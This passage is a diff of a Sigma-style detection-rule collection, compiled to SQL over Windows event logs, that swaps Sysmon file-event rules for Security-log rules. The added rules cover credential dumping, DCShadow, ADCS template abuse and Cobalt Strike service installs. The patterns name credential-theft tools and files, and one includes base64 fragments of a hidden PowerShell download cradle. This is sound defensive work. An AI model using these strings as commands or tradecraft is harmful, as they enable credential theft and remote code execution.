"author": "Tim Rauch (rule), Elastic (idea)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1574", - "attack.t1574.001", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR Image LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR Image LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "Suspicious desktop.ini Action", - "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Operations performed through Windows SCCM or equivalent", - "Read only access list authority" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_desktop_ini.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", - "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.003", - "attack.t1003.004", - "attack.t1003.005" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate used of encrypted ZIP files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "Transferring Files with Credential Data via Network Shares", + "id": "910ab938-668b-401b-b08c-b596e80fdca5", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26858" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Transferring sensitive files for legitimate administration work by legitimate administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" }, { - "title": "Creation of a Diagcab", - "id": "3d0ed417-3d94-4963-a562-4a92c940656a", + "title": "Password Protected ZIP File Opened", + "id": "00ba9da1-b510-4f6b-b258-8d338836180f", "status": "experimental", - "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", - "author": "frack113", - "tags": [ - "attack.resource_development" - ], + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate microsoft diagcab" + "Legitimate used of encrypted ZIP files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.diagcab' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_diagcab.yml" + "filename": "win_security_susp_opened_encrypted_zip.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", - "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Suspicious Access to Sensitive File Extensions", + "id": "91c945bc-2ad1-4799-a591-4d00198a1215", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects known sensitive file extensions accessed on a network share", + "author": "Samir Bousseaden", "tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.collection", + "attack.t1039" ], "falsepositives": [ - "Unknown" + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_susp_raccess_sensitive_fext.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", - "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", + "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", + "id": "f63508a0-c809-4435-b3be-ed819394d612", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" ], - "filename": "file_event_win_winrm_awl_bypass.yml" + "filename": "win_security_user_driver_loaded.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "Possible DC Shadow Attack", + "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DCShadow via create new SPN", + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1207" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "Valid on domain controllers; exclude known DCs" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_possible_dc_shadow.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "title": "DPAPI Domain Master Key Backup Attempt", + "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.004" ], "falsepositives": [ - "Unlikely" + "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" }, { - "title": "GoToAssist Temporary Installation Artefact", - "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_gotoopener_artefact.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "title": "Invoke-Obfuscation Via Stdin - 